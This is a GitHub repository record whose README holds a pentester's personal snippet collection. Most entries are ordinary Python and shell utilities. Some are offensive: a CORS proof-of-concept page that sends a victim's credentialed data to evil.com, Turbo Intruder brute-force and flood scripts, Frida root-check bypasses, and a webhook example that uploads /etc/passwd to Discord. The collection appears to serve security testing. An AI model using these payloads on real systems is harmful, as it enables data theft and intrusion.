{"id":16649462,"url":"https://github.com/anon-exploiter/code-snippets","last_synced_at":"2026-01-31T10:33:37.527Z","repository":{"id":49439832,"uuid":"290131009","full_name":"Anon-Exploiter/code-snippets","owner":"Anon-Exploiter","description":"A Github repo maintaining (mostly) python code snippets which I use approximately daily and to save time searching for them locally/via google","archived":false,"fork":false,"pushed_at":"2024-10-11T01:39:55.000Z","size":242,"stargazers_count":3,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-04-09T17:05:02.670Z","etag":null,"topics":["boto3","multiprocessing","python3","s3","slack-webhook","snippets","xlrd","xlsx-parsing"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Anon-Exploiter.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-08-25T06:20:13.000Z","updated_at":"2024-10-11T01:39:59.000Z","dependencies_parsed_at":"2024-12-20T13:52:07.746Z","dependency_job_id":"e8a1da53-efae-4037-a982-6c36864ee65f","html_url":"https://github.com/Anon-Exploiter/code-snippets","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/Anon-Exploiter/code-snippets","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Anon-Exploiter%2Fcode-snippets","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Anon-Exploiter%2Fcode-snippets/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Anon-Exploiter%2Fcode-snippets/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Anon-Exploiter%2Fcode-snippets/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Anon-Exploiter","download_url":"https://codeload.github.com/Anon-Exploiter/code-snippets/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Anon-Exploiter%2Fcode-snippets/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":28938607,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-01-31T10:18:23.202Z","status":"ssl_error","status_checked_at":"2026-01-31T10:18:22.693Z","response_time":128,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["boto3","multiprocessing","python3","s3","slack-webhook","snippets","xlrd","xlsx-parsing"],"created_at":"2024-10-12T09:10:06.479Z","updated_at":"2026-01-31T10:33:37.511Z","avatar_url":"https://github.com/Anon-Exploiter.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# (Useful) Code/Command Snippets\n\nA github repo maintaining mostly (python) code snippets and commands which I use approximately daily and to save time searching for them in local source code/via google. \n\n\n\n## Code Snippets\n\n### Pentesting\n\n#### POC for C0RS\n\n```html\n\u003c!DOCTYPE html\u003e\n\u003chtml\u003e\n    \u003cbody\u003e\n        \u003ccenter\u003e\n            \u003ch3\u003eSteal customer data!\u003c/h3\u003e\n            \u003cbutton type='button' onclick='cors()'\u003eExploit\u003c/button\u003e\n            \u003cp id='demo'\u003e\u003c/p\u003e\n            \u003cscript\u003e\n                function cors() {\n                    var xhttp = new XMLHttpRequest();\n                    xhttp.onreadystatechange = function() {\n                        if (this.readyState == 4 \u0026\u0026 this.status == 200) {\n                            var a = this.responseText; // Sensitive data from subdomain.site.com about user account\n                            document.getElementById(\"demo\").innerHTML = a;\n                            \n                            xhttp.open(\"POST\", \"http://evil.com\", true);// Sending that data to Attacker's website\n                            xhttp.withCredentials = true;\n                            \n                            console.log(a);\n                            xhttp.send(\"data=\" a);\n                        }\n                    }\n                    xhttp.open(\"GET\", \"https://subdomain.site.com/data-endpoint\", true);\n                    xhttp.withCredentials = true;\n                    xhttp.send();\n                }\n            \u003c/script\u003e\n        \u003c/center\u003e\n    \u003c/body\u003e\n\u003c/html\u003e\n```\n\n\n\n### BurpSuite\n\n#### Bruteforce wordlist using Turbo Intruder and write results in file\n\n```python\ndef queueRequests(target, wordlists):\n    engine = RequestEngine(endpoint=target.endpoint,\n                           concurrentConnections=500,\n                           requestsPerConnection=5000,\n                           pipeline=False\n                           )\n\n    for word in open('/home/umar_0x01/url/wordlist4.txt'):\n        engine.queue(target.req, word.rstrip())\n\n\ndef handleResponse(req, interesting):\n    with open('/tmp/test.txt', 'a+') as f:\n        if 'set-cookie: session=' not in req.response:\n            if '302' in req.response:\n                table.add(req)\n                f.write(req.response)\n```\n\n\n\n#### Send same requests indefinitely using Turbo intruder\n\n```python\ndef queueRequests(target, wordlists):\n    engine = RequestEngine(endpoint=target.endpoint,\n                           concurrentConnections=100,\n                           requestsPerConnection=1000,\n                           pipeline=False,\n                           maxRetriesPerRequest=0,\n                           engine=Engine.THREADED\n                           )\n    word = \"test\"\n    while True:\n        engine.queue(target.req, word.rstrip())\n\n\ndef handleResponse(req, interesting):\n    if '500' in req.response:\n        table.add(req)\n```\n\n\n\n#### Burp extensions to exclude\n\n```powershell\n.*\\.(gif|jpg|png|css|js|ico|svg|eot|woff|woff2|ttf|ts|mp4|otf|jpeg)\n```\n\n\n\n### Helpful Code Blocks\n\n#### Preventing certificate warning with requests/urllib3 while using proxy\n\n```python\nimport urllib3\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n```\n\n\n\n#### Getting all IPs in a CIDR range using python\n\n```bash\nfor ips in ipaddress.ip_network('192.168.100.0/24'): print(ips)\n```\n\n\n\n#### Execute commands in a file with multiprocessing (like downloading of videos using aria2c)\n\n```python\n# python3 exec.py commands.sh 5\n\nimport concurrent.futures\nfrom sys import argv\nfrom os import system\n\nPROCESSES   = int(argv[2])\n\nwith open(argv[1], 'r') as f:\n    commands = f.read().strip().split(\"\\n\")\n\ndef execute_command(cmd):\n    print(cmd)\n    system(cmd)\n\nwith concurrent.futures.ProcessPoolExecutor(max_workers = PROCESSES) as executor:\n    executor.map(execute_command, commands)\n```\n\n\n\n#### Python Progressbar2 with requests\n\n```bash\npip install progressbar2\n```\n\n```python\nimport progressbar\nimport requests\n\n\nprogressbar.streams.wrap_stderr()\n\n\ndef makeRequest(url, path):\n    response = requests.get(\n        url + path\n    )\n\n    if response.status_code == 200:\n        print(f\"[#] {url}{path} -\u003e {response.status_code}\")\n\n\ndef main():\n    PATHS = ['/admin', '/adm', '/ad', '/admn', '/a', '/amin', '/ain', '/an', '/dmin', '/post', '/in', '/din', '/amin', '/dmin', '/din', '', '/amin', '/dmin', '/din', '/admi']\n\n    URL = 'https://umar0x01.sh'\n\n    print(\"[$] Starting direnum...\\n\")\n\n    for pths, i in zip(PATHS, progressbar.progressbar(range(len(PATHS) - 1), redirect_stdout=True)):\n        makeRequest(URL, pths)\n\n\nif __name__ == '__main__':\n    main()\n```\n\n\n### Wordlists Generation\n\n#### Generate wordlist using python3 containing uppercase, lowercase, and digits upto specific characters (custom stop)\n\n```python\nimport random\nimport string\n\ncharacters = 5\n\nwith open('wordlist.txt', 'a+') as f:\n\twhile True:\n\t\tf.write( f\"{''.join(random.choices(string.ascii_uppercase + string.ascii_lowercase + string.digits, k=characters))}\\n\" )\n```\n\nRun it with:\n\n```bash\npython3 gen.py\ncat wordlist.txt | sort | uniq \u003e sort_uniq_wordlist_5chars.txt\n```\n\n\n### Mobile Applications Testing\n\n#### VSCode Java remote process debugging using adb port forward\n\nPort forwarding:\n\n```bash\nadb jdwp\nadb forward tcp:54327 jdwp:3486\n```\n\nVS Code config file:\n\n```json\n{\n    \"version\": \"0.2.0\",\n    \"configurations\": [\n        {\n            \"type\": \"java\",\n            \"name\": \"Debug (Attach)\",\n            \"request\": \"attach\",\n            \"hostName\": \"localhost\",\n            \"port\": 54327\n        }\n    ]\n}\n```\n\n\n\n#### Basic frida code to bypass root check (owasp uncrackable 1-2)\n\n```javascript\nJava.perform(function() {\n    var root_lib = Java.use('sg.vantagepoint.a.b');\n\n    root_lib.a.implementation = function() {\n        return false;\n    }\n\n    root_lib.b.implementation = function() {\n        return false;\n    }\n\n    root_lib.c.implementation = function() {\n        return false;\n    }\n})\n```\n\n\n\n#### Frida code to run an imported method from native library by hooking onCreate and calling it with it's parameters\n\nCC: @makman\n\n```javascript\nJava.perform(function () {\n    var MainActivity = Java.use('com.example.application.MainActivity');\n    MainActivity.onCreate.implementation = function (paramBundle) {\n        console.log(\"\\n[+] Inside onCreate\\n\");\n        console.log(this.stringFromJNI());\n        this.onCreate(paramBundle);\n    };\n});\n```\n\n\n\n#### PHP code to decode a XOR base64 encoded string while having the key (retrieved from the native method from android application)\n\nCC: @makman\n\n```php\n\u003c?php\n\n$secret = 'XUBBUkRfQ3xyUnt5THxdX28IAQ0CZm8LVnBteXBacwdAFW8LCAYDTA==';\n\n$secret = base64_decode($secret);\n\n$secret_length = strlen($secret);\n\n$key = '842109';\n$key_length = strlen($key);\n\n$flag = [];\n\nfor ($i = 0; $i \u003c $secret_length; $i++) {\n    $single = $secret[$i];\n    $flag[] = $key[$i % $key_length] ^ $single;\n}\n\necho implode('', $flag);\n\n?\u003e\n```\n\n\n\n#### Basic Java code to decrypt AES encrypted base64 encoded string with IV/Key\n\n```java\nimport java.io.PrintStream;\nimport java.util.Base64;\nimport javax.crypto.Cipher;\nimport javax.crypto.spec.IvParameterSpec;\nimport javax.crypto.spec.SecretKeySpec;\n\nclass RaceCondition {\n    public static String decrypt(String valueData) {\n        try {\n            IvParameterSpec iv = new IvParameterSpec(\"fedcba9876543210\".getBytes(\"UTF-8\"));\n            SecretKeySpec skeySpec = new SecretKeySpec(\"0123456789abcdef\".getBytes(\"UTF-8\"), \"AES\");\n            Cipher cipher = Cipher.getInstance(\"AES/CBC/PKCS5Padding\");\n            cipher.init(2, skeySpec, iv);\n            byte[] temp = Base64.getDecoder().decode(valueData);\n            return new String(Base64.getDecoder().decode(cipher.doFinal(temp)));\n        } catch (Exception ex) {\n            ex.printStackTrace();\n            return null;\n        }\n    }\n\n    public static void main(String[] args) {\n        System.out.println(decrypt(\"sqCDT4L+YF5hHNPj9hTgzWuuyXOTFruD8LfbyIs/nlYgeaVZMWZmXeQknnHzAQhKCdREPXfXAX3nSp1HgFJmKw==\"));\n    }\n}\n```\n\n\n\n#### Decrypting AES encrypted b64 encoded string when you've to convert IV/SecretKey into bytes\n\n```java\nimport java.security.MessageDigest;\nimport java.security.spec.AlgorithmParameterSpec;\nimport javax.crypto.Cipher;\nimport javax.crypto.spec.IvParameterSpec;\nimport javax.crypto.spec.SecretKeySpec;\nimport java.util.Base64;\nimport java.nio.charset.StandardCharsets;\n\nclass LayerTwo {\n    static byte[] decrypt_text(byte[] ivBytes, byte[] keyBytes, byte[] bytes) throws Exception {\n        AlgorithmParameterSpec ivSpec = new IvParameterSpec(ivBytes);\n        SecretKeySpec newKey = new SecretKeySpec(keyBytes, \"AES\");\n        Cipher cipher = Cipher.getInstance(\"AES/CBC/PKCS5Padding\");\n\n        cipher.init(2, newKey, ivSpec);\n        return cipher.doFinal(bytes);\n    }\n\n    public static byte[] decrypt(String ivStr, String keyStr, String base64_text) throws Exception {\n        byte[] base64_text_decoded = Base64.getDecoder().decode(base64_text);\n        MessageDigest md = MessageDigest.getInstance(\"MD5\");\n        md.update(ivStr.getBytes());\n\n        byte[] ivBytes = md.digest();\n        MessageDigest sha = MessageDigest.getInstance(\"SHA-256\");\n        sha.update(keyStr.getBytes());\n        return decrypt_text(ivBytes, sha.digest(), base64_text_decoded);\n    }\n\n    public static void main(String[] args) {\n        try {\n            // Ip address\n            // \"admin_name\":\"Sm0e+2JxJqOeXWQo0ZdZiQ==\",\"admin_pass\":\"w9SEXEWvemvKS3PdVvfKBQ==\"\n            String ip_address = \"9I3aP8MS/VKnzPKbx7swGxaMfaoGF0GEbSq64KZFsyg=\";\n            byte[] decrypted_text = decrypt(\"Lahore\", \"WelcomeToLahore\", ip_address);\n            String decryted_text_into_string = new String(decrypted_text, StandardCharsets.UTF_8);\n            System.out.println(decryted_text_into_string);\n        }\n\n        catch (Exception e) {\n            e.printStackTrace();\n        }\n    }\n}\n```\n\n\n\n#### Frida snippet to intercept remove syscall from native library of android and return 000 (so file doesn't get deleted)\n\nCC: @makman\n\n```javascript\nInterceptor.attach(Module.getExportByName('libnative-lib.so', 'remove'), {\n    onEnter: function (args) {\n        args[0] = ptr('000');\n    },\n    onLeave: function (retval) {\n        console.log(\"++++++++++++++++++++++\");\n    }\n});\n```\n\n\n\n### Generic Automation\n\n#### Selenium auto open, parse, fetch g-recaptcha response from the page for further login\n\n```python\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.chrome.service import Service\n\nfrom selenium.webdriver.common.by import By\n\nchrome_service = Service(ChromeDriverManager().install())\n\nchrome_options = Options()\noptions = [\n    \"--headless\",\n    \"--disable-gpu\",\n    \"--window-size=1920,1200\",\n    \"--ignore-certificate-errors\",\n    \"--disable-extensions\",\n    \"--no-sandbox\",\n    \"--disable-dev-shm-usage\"\n]\nfor option in options:\n    chrome_options.add_argument(option)\n\ndriver = webdriver.Chrome(service=chrome_service, options=chrome_options)\ndriver.get(\"https://vulms.vu.edu.pk/LMS_LP.aspx\")\n\ncaptcha_text = driver.find_element(By.ID, \"g-recaptcha-response\")\nprint(captcha_text.get_attribute('value'))\n```\n\n\n\n#### Convert .HEIC to .jpg using python and linux\n\n```python\nimport os \n\nfor files in os.listdir():\n\tif \".HEIC\" in files:\t\n\t\tcommand = f\"heif-convert {files} {files.replace('.HEIC', '.jpg')}\"\n\t\tprint(command)\n\t\tos.system(command)\n```\n\n\n\n#### Usage of multiprocessing in Python3\n\n```python\n\"\"\"\nUsage of multiprocessing within python3\n\nWhile passing arguments to the function, we need to provide it with [list] data type. In\ncase your program doesn't provide you with a list to work with, you can create one yourself\nout of a variable using the following method:\n\n[variable] * 10 == [variable(0), variable(1), variable(2), ... variable(9)]\n\n`max_workers` is the number of processes to launch.\n\"\"\"\n\nimport concurrent.futures\nfrom time import sleep\n\nPROCESSES   = 10\n\ndef goToSleep(time):\n    sleep(time)\n    print(f\"[#] Slept for {time} seconds!\")\n\nwith concurrent.futures.ProcessPoolExecutor(max_workers = PROCESSES) as executor:\n    executor.map(goToSleep, [2] * 50)\n```\n\n\n\n#### Return week day today from the start of the year\n\n```python\n\"\"\"\nReturn week day today from the start of the year\nRight now it's: 35\n\"\"\"\n\nimport datetime\n\ndef returnWeekNumber():\n    weekNumber = datetime.date.today().isocalendar()[1]\n    return(str(weekNumber))\n```\n\n\n\n#### Return list[] of dates from today to past days (e.g: 7 days from now to past) \n\n```python\n\"\"\"\nReturn list[] of dates from today to past days, such as 7 days from now to past:\n['25-08-2020', '24-08-2020', '23-08-2020', '22-08-2020', '21-08-2020', '20-08-2020', '19-08-2020']\n\nCan further reverse the list by [::-1] to get past -\u003e present\n\"\"\"\n\nimport datetime\n\ndef returnDates():\n    numdays = 7\n    date_list = [ (datetime.date.today() - datetime.timedelta(days=_)).strftime('%d-%m-%Y')\n            for _ in range(numdays)]\n    return(date_list)\n```\n\n\n\n#### Parsing XLSX file and returning columns in `list(tuple(N, Z))` format\n\n```python\n\"\"\"\nParses XLSX file using xlrd module (to be installed through pypi)\nReturns `column 0` and `column 2` from the XLSX sheet in the \nform of list[tuple(1, 2), tuple(3, 4), .... tuple(N, Z)]\n\nTakes filename of the excel (xlsx) sheet as input\n\"\"\"\n\nimport xlrd\n\ndef parseXLSX(xlsxFile):\n    results = []\n    wb      = xlrd.open_workbook(xlsxFile) \n    sheet   = wb.sheet_by_index(0) \n    sheet.cell_value(0, 0) \n\n    for i in range(sheet.nrows): \n        _date   = sheet.cell_value(i, 0).strip()\n        _type   = sheet.cell_value(i, 2).strip()\n\n        count.append( (_date, _type) )\n\n    return(count)\n\nxlsxFileName    = 'test.xlsx'\ndateAndTypes    = parseXLSX(xlsxFileName)\nfor _tuples in dateAndTypes:\n    print(_tuples)\n```\n\n\n\n#### Matching a element in two JSON files and printing out latter's objects based on match\n\n```python\nimport json\n\nwith open(\"new.json\", \"r\", encoding=\"utf-8\") as f:\n    new_json = json.loads(f.read().strip())\n\nwith open(\"old.json\", \"r\", encoding=\"utf-8\") as f:\n    old_json = json.loads(f.read().strip())\n\ncourse_names = []\nto_write = []\n\nfor elem in new_json:\n    course_names.append(elem[\"name\"])\n\nfor elements in old_json:\n    old_names = elements[\"name\"]\n\n    for names in course_names:\n        if names == old_names:\n            to_write.append(elements)\n\nprint(json.dumps(to_write, indent=4))\n```\n\n\n\n#### Creating commands for downloading torrent files, one at a time with aria2c, upload on gdrive, **remove some stuff**\nCreated for myself, read the code before using it!\n\n```python\nfrom sys import argv\nimport os\n\ngDdriveID   = argv[1]\nbucket      = argv[2]\n\ndef returnIdAndName(torrentFile, grep):\n    command         = f\"aria2c --show-files {torrentFile}\"\n    results         = os.popen(command).read().strip().split(\"\\n\")\n\n    res             = []\n\n    for data in results:\n        if grep in data:\n            res.append(data)\n\n    for stuff in res:\n        count, fileNames = stuff.strip().split(\"|\")\n        command     = f\"set -x \u0026\u0026 aria2c --seed-time=0 --max-upload-limit=1K --seed-ratio=0.0 --select-file {count} {argv[1]} \u0026\u0026 gupload -r {gDdriveID} \\\"{fileNames}\\\" \u0026\u0026 rm -rfv *\"\n        # command   = f\"set -x \u0026\u0026 aria2c --file-allocation=none --seed-time=0 --max-upload-limit=1K --seed-ratio=0.0 --select-file {count} {argv[1]} \u0026\u0026 aws s3 cp \\\"{fileNames}\\\" \\\"s3://{bucket}/\\\" --endpoint-url=https://s3.wasabisys.com --no-sign-request \u0026\u0026 rm -rfv *\"\n        print(command)\n\ndef main():\n    torrentFile     = argv[1]\n    grep            = \".mkv\"\n\n    returnIdAndName(torrentFile, grep)\n\nif __name__ == '__main__':\n    main()\n```\n\n\n\n#### Downloading PDFs (lectures) from VU\n\n```python\nimport requests\nimport os\n\nfor lesson in range(1, 22 + 1):\n    url     = f'https://vulms.vu.edu.pk/Courses/PHY101/Lessons/Lesson_{lesson}/Lecture{str(lesson).zfill(2)}.pdf'\n    print(url)\n\n    command = f'aria2c -s 10 -j 10 -x 16 -c --file-allocation=none \"{url}\"'\n    os.system(command)\n```\n\n\n\n#### Youtube playlist reverse download -- python3\n\nUse with https://github.com/yt-dlp/yt-dlp for best downloading\n\n```python\nimport os\n\nplaylist    = \"https://www.youtube.com/c/.../videos\"\ncommand     = f\"youtube-dl -j --flat-playlist --playlist-reverse {playlist} | jq -r '.id' | sed 's_^_https://youtu.be/_'\"\nprint(command)\nprint()\n\noutput      = os.popen(command).read()\nprint(output)\n\nytUrls      = []\n\nfor count, urls in zip(range(1, 100000), output.strip().split(\"\\n\")):\n    count   = str(count).zfill(3)\n    cmd     = f'youtube-dl -f mp4 -i -v -R 3 --fragment-retries 3 -c -o \"{count} - %(title)s.%(ext)s\" {urls} --external-downloader \"aria2c\" --external-downloader-args \"-j 10 -s 10 -x 16 --file-allocation=none -c\"'\n    print(cmd)\n```\n\n\n\n### Cloud\n\n#### Creating S3 presigned url with 1 hour expiration time\n\n```python\nimport boto3\nimport botocore\n\n\ndef s3ClientCall():\n    return boto3.client('s3')\n\n\nclientCall      = s3ClientCall()\n\nbucketName = 'test-bucket'\nobjectName = 'secret.txt'\n\npresignedURL    = clientCall.generate_presigned_url('get_object',\n    Params      = {\n        'Bucket': bucketName,\n        'Key': objectName\n    },\n\t\tExpiresIn   = 3600\n)\n\nprint(presignedURL)\n```\n\n\n\n#### Reading file from a S3 bucket using access keys directly through variables (I know it's unsecure :P)\n\n```python\n\"\"\"\nReading file from a S3 bucket using access keys directly through \nvariables (I know it's unsecure :P)\n\nTakes region of the bucket, the bucket, file to read, access key and secret access key\n\"\"\"\n\nimport boto3\n\ndef readFileFromS3(region, bucket, file, ACCESS_KEY, SECRET_KEY):\n    s3 = boto3.resource('s3',\n        region_name             = region,\n        aws_access_key_id       = ACCESS_KEY,\n        aws_secret_access_key   = SECRET_KEY,\n    )\n\n    bucket = s3.Object(bucket, file)\n    body = bucket.get()['Body'].read().decode()\n\n    return(body)\n\nsourceCode  = readFileFromS3(region='eu-west-1', bucket='test-bucket', file='test.json', \n                                ACCESS_KEY='', SECRET_KEY='')\nprint(sourceCode)\n```\n\n\n\n### Webhooks\n\n#### Simple function to write a preformatted Slack JSON to a Webhook\n\n```python\n\"\"\"\nSimple function to write a preformatted Slack JSON to a Webhook\nTakes the webhook URL and preformatted JSON as input\n\"\"\"\n\nimport requests\n\ndef postSlackPost(webhook, slackPost):\n    request     = requests.post(webhook,\n        headers = {\n            'Content-type': 'application/json', \n        },\n        json    = slackPost,\n    )\n\n    print(request)\n    print(request.status_code)\n    print(request.text)\n\nwebhook     = \"https://hooks.slack.com/services/XXXXXXX/XXXXXX/XXXXXXXXXXXXXXXXXX\"\nslackPost   = {\n    \"text\": \"Hello, world!\"\n}\n\npostSlackPost(webhook, slackPost)\n```\n\n\n\n#### Uploading of (text) files in Discord channel through webhooks\n\n```python\n\"\"\"\nPython3 snippet allowing uploading of (text) files in discord server's\nchannel through webhook\n\"\"\"\n\nimport os \nimport requests\nimport datetime\n\ndef postFileOnDiscord(webhook, fileName):\n\twith open(fileName, 'r') as f: fileContents = f.read().strip()\n\n\tdiscordText\t= {\"content\": fileContents}\n\tresponse\t= requests.post(webhook, json = discordText)\n\n\tif response.status_code == 204:\n\t\tprint(f\"[#] File {fileName} posted in channel!\")\n\n\telse:\n\t\tprint(f\"[!] There was a issue uploading {fileName} in the channel!\\nTrace:\\n\")\n\t\tprint(response.status_code)\n\t\tprint(response.headers)\n\t\tprint(response.text)\n\ndef main():\n\twebhook \t= \"https://discordapp.com/api/webhooks/xxxxxxxxxxxxxxx/xxxxxxxxx\"\n\tfileName \t= \"/etc/passwd\"\n\n\tpostFileOnDiscord(webhook, fileName)\n\nif __name__ == '__main__':\n\tmain()\n```\n\n\n\n#### Uploading files to Slack `channels` through `Bot` using `cURL` with `OAuth Access Token`\n\n```bash\ncurl -v -i -s -k -X $'POST' \\\n-H $'Host: slack.com' \\\n-H $'Accept: */*' \\\n-H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64)' \\\n-H $'Origin: https://api.slack.com' \\\n-H $'Sec-Fetch-Site: same-site' \\\n-H $'Sec-Fetch-Mode: cors' \\\n-H $'Sec-Fetch-Dest: empty' \\\n-H $'Accept-Language: en-US,en;q=0.9,la;q=0.8' \\\n-H $'Connection: close' \\\n-F file=@backup.7z \\\n  $'https://slack.com/api/files.upload?token=xoxp-xxx-xxx-xxx-xxxx\u0026channels=myFiles\u0026pretty=1'\n```\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n## Command Snippets\n\n\n### Pentesting\n\n#### Using nuclei all templates against a list containing urls\n\n```powershell\ncat urls.txt | nuclei -t cves -t vulnerabilities -t technologies -t workflows -t dns -t generic-detections -t subdomain-takeover -t wordlists -t panels -t files -t security-misconfiguration -t tokens -t fuzzing -t default-credentials -t payloads -t misc\n```\n\n\n#### SonarQube - CLI Scan\n\nScans the current folder `.`\n\n```powershell\nsonar-scanner \\\n  -Dsonar.projectKey=PentestProject \\\n  -Dsonar.sources=. \\\n  -Dsonar.host.url=http://192.168.xxx.xxx:9000 \\\n  -Dsonar.login=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\n```\n\n\n### iOS\n\n#### Find all the .plists in the local directory and write into one\n\n```bash\nfor files in $(find . -name '*.plist'); do\n\techo  \u003e\u003e plists.xml\n\techo $files \u003e\u003e plists.xml\n\techo  \u003e\u003e plists.xml\n\tplistutil -i $files  \u003e\u003e plists.xml\ndone\n```\n\n\n### Development\n\n#### Creating and uploading package on PyPi\n\n```powershell\npython3 setup.py sdist bdist_wheel\ntwine check dist/*\ntwine upload dist/*\n```\n\n\n\n\n### Linux\n\n#### Installing docker (and adding user in docker group)\n\n```bash\nsudo apt-get -y update \u0026\u0026 \\\n    sudo apt-get -y install apt-transport-https ca-certificates curl gnupg-agent software-properties-common \u0026\u0026 \\\n    curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add - \u0026\u0026 \\\n    sudo add-apt-repository \"deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable\" \u0026\u0026 \\\n    sudo apt-get -y update \u0026\u0026 \\\n    sudo apt-get -y install docker-ce docker-ce-cli containerd.io \u0026\u0026 \\\n    sudo usermod -aG docker $USER\n```\n\n\n\n#### Generate wordlist using crunch containing uppercase, lowercase, and digits of upto 4-5 placeholders (5.2 GB)\n\n```bash\ncrunch 4 5 -f /usr/share/crunch/charset.lst mixalpha-numeric -o charlist.txt\n```\n\n\n\n#### Install XRDP + XFCE in Ubuntu 18.04 instance\n\n```powershell\nsudo apt-get update\nsudo apt-get install xfce4 xfce4-terminal\nsudo apt-get install xrdp\nsudo systemctl enable xrdp\nsudo sed -i.bak '/fi/a #xrdp multiple users configuration n xfce-session n' /etc/xrdp/startwm.sh\nsudo /etc/init.d/xrdp restart\n```\n\n\n#### Pop OS! - Initial setup tools \n\n```powershell\nsudo add-apt-repository ppa:fossfreedom/indicator-sysmonitor\n\nsudo apt install plank gdebi tmux figlet toilet htop google-chrome-stable chromium-browser gnome-tweaks mpv flameshot peek deluge deluge-gtk aria2 vlc python3-venv virtualenv nmap php-cli python python3 python3-pip network-manager openvpn kazam remmina netdiscover openjdk-8-jdk openjdk-8-jre rar unrar gdb traceroute apt-transport-https indicator-netspeed-unity indicator-sysmonitor upx\n```\n\n\n\n#### Fixing NTFS mounting or other shits or error on hdd/ssd:\n\n```powershell\nsudo ntfsfix /dev/nvme0n1p4\n```\n\n\n\n\n\n\n### Cloud\n#### Getting STS tokens with export= for CLI - Add in $PATH\n\n```python\n#!/usr/bin/python3\n\n\nfrom sys import argv\nfrom os import popen\n\nimport json\nimport argparse\n\n\ndef getMfaSerial(profile):\n    if profile == None:\n        command     = \"aws iam list-mfa-devices --query MFADevices[*].SerialNumber\"\n\n    else:\n        command     = f\"aws iam list-mfa-devices --query MFADevices[*].SerialNumber --profile {profile}\"\n\n    try:\n        mfaSerial   = json.loads(popen(command).read())\n        return(mfaSerial[0])\n\n    except IndexError:\n        print(\"[!] Wrong MFA token for the wrong profile? Maybe?\")\n        exit(1)\n\n\ndef getSessionTokens(profile, mfaSerial, mfaToken):\n    try:\n        if profile == None:\n            command     = f\"aws sts get-session-token --serial-number {mfaSerial} --token {mfaToken}\"\n\n        else:\n            command     = f\"aws sts get-session-token --serial-number {mfaSerial} --token {mfaToken} --profile {profile}\"\n\n        token       = json.loads(popen(command).read())[\"Credentials\"]\n        return(token)\n\n    except json.decoder.JSONDecodeError:\n        exit('[!] Please enter correct MFA!')\n\n\ndef addArguments():\n    parser = argparse.ArgumentParser(description='', usage=f'\\r[#] Usage: getSTSToken --mfa 123456 --profile default')\n    parser._optionals.title = \"Basic Help\"\n\n    opts = parser.add_argument_group(f'Arguments')\n    opts.add_argument('-m', '--mfa',     action=\"store\", dest=\"mfa\",     default=False, help='MFA of the user account')\n    opts.add_argument('-p', '--profile', action=\"store\", dest=\"profile\", default=False, help='Access keys profile ( -\u003e default if none given)')\n\n    args = parser.parse_args()\n    return(args, parser)\n\n\ndef main():\n    args, parser = addArguments()\n\n    if args.mfa:\n        mfa = int(args.mfa)\n\n        if args.profile:\n            profile = args.profile\n\n        else:\n            profile = None\n\n        mfaSerial       = getMfaSerial(profile)\n        sessionTokens   = getSessionTokens(profile, mfaSerial, mfa)\n\n        print(f\"export AWS_ACCESS_KEY_ID={sessionTokens['AccessKeyId']}\")\n        print(f\"export AWS_SECRET_ACCESS_KEY={sessionTokens['SecretAccessKey']}\")\n        print(f\"export AWS_SESSION_TOKEN={sessionTokens['SessionToken']}\")\n\n    else:\n        parser.print_help()\n        exit()\n\n\nif __name__ == '__main__':\n    main()\n```\n\n\n\n#### Creating layer for AWS Lambda function\n\n```bash\nmkdir -p python \u0026\u0026 \\\n\tcd python \u0026\u0026 \\\n\tpip install -r ../requirements.txt -t . \u0026\u0026 \\\n\tcd ../ \u0026\u0026 \\\n\tzip -rv python.zip python/\n```\n\n\n\n#### EC2 Instance setup\n\nQuick and dirty setup of instance with .tmux.conf and squid-proxy\n\n```bash\nsudo apt update \u0026\u0026 \\\n    sudo apt-get upgrade -y \u0026\u0026 \\\n    cd \u0026\u0026 \\\n    sudo apt-get install -y squid squid-deb-proxy squid-deb-proxy-client squidclient apache2-utils wget curl net-tools nano python3 python3-pip aria2 \u0026\u0026 \\\n    sudo apt-get install -y tmux htop file git p7zip-full ruby ruby-dev zlib1g-dev \u0026\u0026 \\\n    sudo service squid start \u0026\u0026 \\\n    sudo rm -rfv /etc/squid/squid.conf \u0026\u0026 \\\n    sudo wget 